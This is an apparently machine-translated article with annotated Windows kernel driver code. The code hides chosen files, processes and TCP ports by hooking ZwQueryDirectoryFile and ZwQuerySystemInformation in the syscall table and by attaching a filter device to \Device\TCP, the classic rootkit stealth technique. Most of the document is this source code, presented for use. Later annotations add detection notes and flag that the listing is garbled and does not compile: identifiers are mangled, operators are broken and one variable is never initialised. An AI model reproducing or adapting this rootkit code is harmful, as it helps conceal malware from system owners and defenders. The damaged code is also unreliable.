Hide any process, directory/file, registry, port


Enumerating processes, directories/files, registry keys and so on eventually makes the operating system call ZwQueryDirectoryFile, ZwQuerySystemInformation, ZwXxxValueKey and similar functions. To intercept these functions for hiding purposes, you implement the functions yourself and modify the syscall table maintained by the system so that it points at your replacements. Because the syscall table is not visible from user mode, it can only be modified from ring 0, i.e. by writing a driver. How to modify it is not described here, since earlier articles have already covered it (see the articles written by sysinternals.com or WebCrazy). Ports are looked up through a TDI query. TDI exports two devices, \\DEVICE\\TCP and \\DEVICE\\UDP. Using the device-filter-driver approach, we can write a driver that takes over all IRP packets sent to these two devices, processes them, and then passes them on to the lower driver, which makes it possible to hide any port. The method described above is not new; it is an old technique that has existed for years. I am posting it only to fill out the board; experts need not bother reading it. Below is a code fragment from my driver that hides any process, directory/file or port.

(The registry operation is described in detail in RegMon and is not listed here.)

// Two 32-bit halves of a file timestamp, used by the directory-entry layout
// below (low half first, then high half).
// NOTE(review): the page's transcription lower-cased most identifiers, so the
// typedef name printed here is `filetime` while `_DIRENTRY` refers to `FILETIME`;
// the listing does not compile as printed and is read here as a sketch only.
typedef struct _FILETIME
{
DWORD Dwlowdatetime; // low 32 bits of the timestamp
DWORD Dwhighdatetime; // high 32 bits of the timestamp
}filetime;
// Author's own view of one record in the buffer that ZwQueryDirectoryFile
// fills. Only a few fields are actually used by the hook below:
// `Dwlentonext` (byte offset to the next record; 0 marks the last one) and
// `suname` (the entry's name, which the hook compares against its hide list).
// The `dwunknown*` fields are, by the author's naming, unidentified padding;
// treat the exact layout as the author's reconstruction rather than a
// documented contract.
typedef struct _DIRENTRY
{
DWORD Dwlentonext; // offset to next record, 0 = last record in the buffer
DWORD dwattr; // file attributes (not read by the hook)
FILETIME ftcreate, ftlastaccess, Ftlastwrite; // timestamps (not read by the hook)
DWORD dwunknown[2];
DWORD Dwfilesizelow;
DWORD Dwfilesizehigh;
DWORD dwunknown2[3];
WORD Wnamelen; // length of `suname` in bytes, presumably — not read by the hook
WORD Wunknown;
DWORD dwUnknown3;
WORD Wshortnamelen;
WCHAR swshortname[12]; // 8.3 short name
WCHAR suname[1]; // start of the variable-length long name; read via RtlInitUnicodeString
} direntry, *pdirentry;
// Per-thread record that trails each `_system_processes` record (see the
// `threads[1]` member there). Nothing in the visible listing reads these
// fields; the layout is the author's reconstruction of the information class
// handled by the process-hiding hook and is not verified here.
struct _system_threads
{
Large_integer Kerneltime;
Large_integer Usertime;
Large_integer Createtime;
ULONG waittime;
PVOID startaddress;
client_id Clientis;
Kpriority Priority;
Kpriority basepriority;
ULONG Contextswitchcount;
ULONG ThreadState;
Kwait_reason Waitreason;
};
// Author's view of one process record in the buffer returned for the
// information class the hook below filters. The hook relies on two fields:
// `Nextentrydelta`, the byte offset to the next record (0 = last record),
// which it rewrites to unlink a record, and `ProcessName`, which is compared
// against the hide list. Everything else is carried through untouched.
// The trailing `threads[1]` is the first element of a variable-length thread
// array (presumably `ThreadCount` entries — not confirmed by the listing).
struct _system_processes
{
ULONG Nextentrydelta; // offset to the next record, 0 = last; rewritten by the hook
ULONG ThreadCount;
ULONG Reserved[6];
Large_integer Createtime;
Large_integer Usertime;
Large_integer Kerneltime;
Unicode_string ProcessName; // image name the hook matches against its list
Kpriority basepriority;
ULONG ProcessID;
ULONG Inheritedfromprocessid;
ULONG Handlecount;
ULONG reserved2[2];
Vm_counters vmcounters;
Io_counters iocounters;
struct _system_threads threads[1]; // start of the per-thread records
};
Hide Directory/File
// Replacement for ZwQueryDirectoryFile, installed (per the article text) by
// pointing the system's syscall table entry at this function.
//
// Behaviour as printed:
//   1. Call the original function through `Oldzwquerydirectoryfile` with the
//      caller's arguments untouched.
//   2. On success, walk the returned `_DIRENTRY` chain. For each record, take
//      its long name, convert it to an upper-cased ANSI string, and compare
//      the leading bytes against every list node flagged `ptr_hidedir`.
//   3. A matching record is removed from the buffer in one of three ways:
//      it is the only record -> the whole call is reported as 0x80000006
//      (STATUS_NO_MORE_FILES); it is the last record -> the previous record's
//      length-to-next is zeroed; otherwise -> the rest of the buffer is copied
//      down over it.
//   4. Return the (possibly rewritten) status to the caller.
//
// Detection note: the hook leaves the syscall table pointing outside the
// kernel image, and the filtered listing disagrees with the on-disk directory
// content, so both table-integrity checks and cross-view comparisons will
// show the discrepancy.
//
// NOTE(review): this listing is transcription-damaged — identifier case varies
// between declaration and use (`RC`/`Rc`/`rc`, `p`/`P`, `PLast`/`Plast`),
// `= =` stands for `==`, `Todo` for `do`, and the bare English sentences
// inside the body are the author's comments whose `//` markers were lost. It
// is kept verbatim and annotated rather than repaired.
// Parameters mirror ZwQueryDirectoryFile; returns its NTSTATUS, possibly
// replaced by 0x80000006 when the only returned entry was hidden.
NTSTATUS Hookzwquerydirectoryfile (
In HANDLE hfile,
In HANDLE hevent OPTIONAL,
In Pio_apc_routine Ioapcroutine OPTIONAL,
In Pvoid Ioapccontext OPTIONAL,
Out Pio_status_block Piostatusblock,
Out Pvoid Fileinformationbuffer,
In ULONG Fileinformationbufferlength,
In File_information_class Fileinfoclass,
In BOOLEAN Breturnonlyoneentry,
In Punicode_string Pathmask OPTIONAL,
In BOOLEAN brestartquery)
{
NTSTATUS RC;
// The locals below (aprocessname, parentdirectory, bytesreturned, Object)
// are declared but never used in the visible body.
CHAR aprocessname[80];
Ansi_string Ansifilename,ansidirname;
Unicode_string Unifilename;
Pp_dir ptr; // cursor over the driver's hide list (List_head, defined elsewhere)
WCHAR parentdirectory[1024] = {0};
int bytesreturned;
PVOID Object;
Perform the old Zwquerydirectoryfile function
// Forward to the saved original entry point; the arguments are passed through unchanged.
Rc= ((zwquerydirectoryfile) (Oldzwquerydirectoryfile)) (Hfile,hevent,ioapcroutine,
Ioapccontext,piostatusblock,fileinformationbuffer,fileinformationbufferlength,
Fileinfoclass,breturnonlyoneentry,pathmask,brestartquery);
if (nt_success (RC))
{
Pdirentry p; // current record
Pdirentry PLast; // previously kept record (NULL while on the first one)
BOOL Blastone; // set when the current record's length-to-next is 0
int found;
p = (pdirentry) fileinformationbuffer; Assign the results of the lookup to the structure
PLast = NULL;

Todo
{
// A zero length-to-next marks the final record of the buffer.
Blastone =! (P->dwlentonext);
// Build an upper-cased ANSI copy of the entry name for the comparison below.
// Both ANSI strings are allocated here (third argument TRUE) on every pass
// and released only once, after the loop.
Rtlinitunicodestring (&unifilename,p->suname);
Rtlunicodestringtoansistring (&ansifilename,&unifilename,true);
Rtlunicodestringtoansistring (&ansidirname,&unifilename,true);
Rtlupperstring (&ansifilename,&ansidirname);

Found=0;
Find in linked list whether or not to include the current directory
// Prefix match: the entry is "found" when the first strlen(name) bytes of the
// upper-cased entry name equal a hide-list name flagged ptr_hidedir.
for (ptr = List_head; ptr!= NULL; ptr = ptr->next)
{
if (Ptr->flag!= ptr_hidedir) continue;
if (Rtlcomparememory (Ansifilename.buffer, Ptr->name,strlen (ptr->name)) = = strlen (ptr->name))
{
found=1;
Break
}
}//end for
If the linked list contains the current directory, hide
if (found)
{
if (Blastone)
{
// Last record: if it is also the first, the buffer becomes empty and the
// status is replaced; otherwise the previous record is made the terminator.
if (p = = (pdirentry) fileinformationbuffer)
{
rc = 0x80000006; Hide
}
Else
Plast->dwlentonext = 0;
Break
}
Else
{
// Middle record: shift everything after it down over it. `ileft` is the
// number of bytes from the next record to the end of the caller's buffer.
int iPos = ((ULONG) p)-(ULONG) Fileinformationbuffer;
int ileft = (DWORD) fileinformationbufferlength-ipos-p->dwlentonext;
Rtlcopymemory ((PVOID) p, (PVOID) ((char *) p + p->dwlentonext), (DWORD) ileft);
// `p` now points at the record that was shifted in, so it is re-examined.
Continue
}
}
// Record kept: remember it as the predecessor and advance.
PLast = p;
p = (pdirentry) ((char *) p + p->dwlentonext);
}while (!blastone);
Rtlfreeansistring (&ansidirname);
Rtlfreeansistring (&ansifilename);
}
return (RC);
}
Hide Process
// Replacement for ZwQuerySystemInformation, installed the same way as the
// directory hook (syscall table entry redirected to this function).
//
// Behaviour as printed:
//   1. Call the original through `oldzwquerysysteminformation`.
//   2. On success, and only for information class 5 (the process list), walk
//      the `_system_processes` chain through `Nextentrydelta`.
//   3. For every record whose `process_name` length is between 1 and 254,
//      compare its leading bytes with each hide-list node flagged
//      `ptr_hideproc`. Matching records are unlinked: the predecessor's
//      `Nextentrydelta` is extended to skip them (or zeroed if they were the
//      tail); for a record with no predecessor the `SystemInformation` pointer
//      is advanced instead. After each unlink the new current record is
//      re-checked until a non-matching one is reached.
//   4. Return the original status.
//
// Detection note: only the returned buffer is edited, so the hidden process
// still exists in every other view of the system (handle tables, scheduler,
// object directory); a cross-view comparison exposes it.
//
// NOTE(review): `process_name` is declared as a local ANSI_STRING but nothing
// in the visible body initialises it from `Curr->ProcessName`; the
// conversion step was presumably dropped when the page was transcribed.
// Likewise `5 = systeminformationclass` reads as `5 == ...`, `+ +` as `+=`,
// and the bare English sentences are the author's comments with the `//`
// lost. `G_hide_proc` is a local that is always TRUE here despite its name.
// Kept verbatim and annotated rather than repaired.
// Parameters mirror ZwQuerySystemInformation; returns its NTSTATUS unchanged.
NTSTATUS Hookzwquerysysteminformation (
In ULONG Systeminformationclass,
In Pvoid SystemInformation,
In ULONG Systeminformationlength,
Out Pulong Returnlength)
{
NTSTATUS RC;
// Only `process_name` is referenced below; the other three strings and
// `aprocessname` are unused in the visible body.
Ansi_string process_name,process_uname,process_name1,process_name2;
BOOL G_hide_proc = TRUE;
CHAR aprocessname[80];
Pp_dir ptr; // cursor over the driver's hide list (list_head, defined elsewhere)
int found;
Perform the old zwquerysysteminformation function
rc = ((zwquerysysteminformation) (oldzwquerysysteminformation)) (Systeminformationclass,
Systeminformation,systeminformationlength,returnlength);
if (nt_success (RC))
{
// Class 5 is the process/thread enumeration; other classes pass through untouched.
if (G_hide_proc && (5 = systeminformationclass))
{
Assign the results of the lookup to the structure
struct _system_processes *curr = (struct _system_processes *) systeminformation;
struct _system_processes *prev = NULL; // last record that was kept, NULL at the head
Traversal process
while (Curr)
{
// Sanity bound on the name length before the byte comparison.
if (0 < Process_name. Length) && (255 > Process_name. Length))
{
Found=0;
Traversing a linked list
// Prefix match against every hide-list name flagged ptr_hideproc.
for (Ptr=list_head;ptr!=null;ptr=ptr->next)
{
if (Ptr->flag!= ptr_hideproc) continue;
if (memcmp (process_name). Buffer,ptr->name,strlen (ptr->name)) = = 0)
{
Found = 1;
}
}
To determine if a process name is hidden, overwrite the process name
// Unlink the current record, then keep unlinking while the record that
// follows also matches.
while (found)
{
if (prev)
{
// Predecessor exists: make it point past the current record
// (or make it the tail if the current record was the tail).
if (Curr->nextentrydelta)
{
Prev->nextentrydelta + + curr->nextentrydelta;
}
Else
{
Prev->nextentrydelta = 0;
}
}
Else
{
// No predecessor: move the start-of-buffer pointer forward instead.
if (Curr->nextentrydelta)
{
(char *) SystemInformation + + curr->nextentrydelta;
}
Else
{
SystemInformation = NULL;
}
}
// Advance to the record that followed the unlinked one.
if (Curr->nextentrydelta)
((char *) Curr + = Curr->nextentrydelta);
Else
{
Curr = Null;break;
}
Traversing a linked list
// Re-run the hide-list match on the new current record.
Found = 0;
for (Ptr=list_head;ptr!=null;ptr=ptr->next)
{
if (Ptr->flag!= ptr_hideproc) continue;
if (memcmp (process_name). Buffer,ptr->name,strlen (ptr->name)) = = 0)
{
Found = 1;
}
}
}
}
// Record kept: it becomes the predecessor and the walk moves on.
if (Curr!= NULL)
{
prev = Curr;
if (Curr->nextentrydelta) ((char *) Curr + = Curr->nextentrydelta);
else Curr = NULL;
}
}
}
}
return (RC);
}
Hide Port
// Port-hiding setup: attaches a filter device on top of \Device\Tcp so that
// every IRP sent to it first passes through this driver.
//
// This is a fragment cut out of a larger routine (it uses `driverobject`,
// `fileobject` and `i`, and `return`s, without any of them being declared
// here); the enclosing function's header is not on the page.
//
// Steps as printed:
//   1. Remember the driver's own IRP_MJ_CREATE handler as `Empty`, used below
//      as the "no specific handler installed" marker.
//   2. Resolve the existing \Device\Tcp device object.
//   3. Create an unnamed device of type FILE_DEVICE_UNKNOWN with a
//      `device_extension`-sized extension.
//   4. Attach it to the top of the TCP device stack; `M_tcpgetdevice` keeps
//      the returned lower device for `passthrough` to forward IRPs to.
//   5. For every major function that the TCP driver handles (compared against
//      `Empty`) and this driver does not, install `passthrough`.
//   6. Drop the file-object reference taken in step 2.
//
// Detection note: an attached device remains part of the \Device\Tcp device
// stack and is visible to anything that enumerates that stack.
//
// NOTE(review): `Tcpdriver` is declared but never assigned in the visible
// fragment, yet it is read in the loop at the end; `Filterdevice` is declared
// without a terminating semicolon; bare English sentences are the author's
// comments with the `//` lost. Kept verbatim and annotated.
Pdevice_object M_tcpgetdevice; // lower device returned by the attach; used by passthrough
Pdevice_object Tcpdevice; // existing \Device\Tcp device object
Unicode_string Tcpdevicename;
Pdriver_object Tcpdriver; // never assigned in this fragment (see note above)
Pdevice_object Tcpgetdevice;
Pdevice_object Filterdevice
Pdriver_dispatch Empty; // the driver's default dispatch, taken from IRP_MJ_CREATE
NTSTATUS status;
Empty = driverobject->majorfunction[irp_mj_create];
Rtlinitunicodestring (&tcpdevicename, L "\\DEVICE\\TCP");
Get the existing device pointer
// On success this also returns a referenced file object (`fileobject`), released at the end.
Status = Iogetdeviceobjectpointer (&tcpdevicename,file_all_access,&fileobject,&tcpdevice);
if (! Nt_success (status))
{
Dbgprint ("Iogetdeviceobjectpointer error!\n");
return status;
}
Dbgprint ("Iogetdeviceobjectpointer ok!\n");
Set up a device
// Unnamed filter device; the NULL name means nothing can open it directly.
Status = IoCreateDevice (Driverobject,sizeof (device_extension), NULL,
File_device_unknown,0,false,&filterdevice);
if (! Nt_success (status))
{
return status;
}
Add Device
Tcpgetdevice = IoAttachDeviceToDeviceStack (Filterdevice, Tcpdevice);
if (! Tcpgetdevice)
{
// Attach failed: tear the device down again. Note the success status returned here.
Iodeletedevice (Filterdevice);
Dbgprint ("IoAttachDeviceToDeviceStack error!\n");
return status_success;
}
M_tcpgetdevice = Tcpgetdevice;
Add to the filter function to process
// Route every major function the TCP driver implements, and this driver does
// not, through passthrough so the IRP still reaches the lower device.
for (i=0;i<irp_mj_maximum_function;i++)
{
if ((Tcpdriver->majorfunction[i]!=empty) && (driverobject->majorfunction[i]==empty)
{
Driverobject->majorfunction[i] = passthrough;
}
}
Obdereferenceobject (FileObject);
// Dispatch routine installed on the filter device for every forwarded major
// function (see the setup fragment above).
//
// Behaviour as printed: if the IRP's DeviceIoControl code equals
// QUERY_INFORMATION_EX, the IRP is completed here with STATUS_SUCCESS and
// never reaches the TCP driver (only `iostatus.status` is set; the author's
// comment marks this as the place where a per-port decision would go).
// Every other IRP is copied to the next stack location, given the completion
// routine `genericcompletion` (not shown on the page), and passed down to the
// lower device saved in `M_tcpgetdevice`.
//
// NOTE(review): the IOCTL field is compared without first checking the IRP's
// major function, so the comparison is made for every forwarded IRP type.
// `= =` reads as `==`; bare English sentences are the author's comments with
// the `//` lost. Kept verbatim and annotated.
// Returns STATUS_SUCCESS for the intercepted query, otherwise the result of
// IoCallDriver on the lower device.
NTSTATUS passthrough (in Pdevice_object deviceobject, in Pirp IRP)
{
NTSTATUS status; // unused in the visible body
Pio_stack_location Pirpstack;
Pirpstack = Iogetcurrentirpstacklocation (IRP);
If the query completes the IRP
if (Pirpstack->parameters.deviceiocontrol.iocontrolcode = = QUERY_INFORMATION_EX)
{
Here you can judge a port a step closer
// Answer the query locally; the lower driver never sees it.
irp->iostatus.status=status_success;
IoCompleteRequest (irp,io_no_increment);
return status_success;
}
Copy the current IRP
// Forward everything else unchanged to the device below the filter.
Iocopycurrentirpstacklocationtonext (IRP);
Iosetcompletionroutine (irp,genericcompletion,null,true,true,true);
Passed
Return IoCallDriver (M_tcpgetdevice, IRP);
}
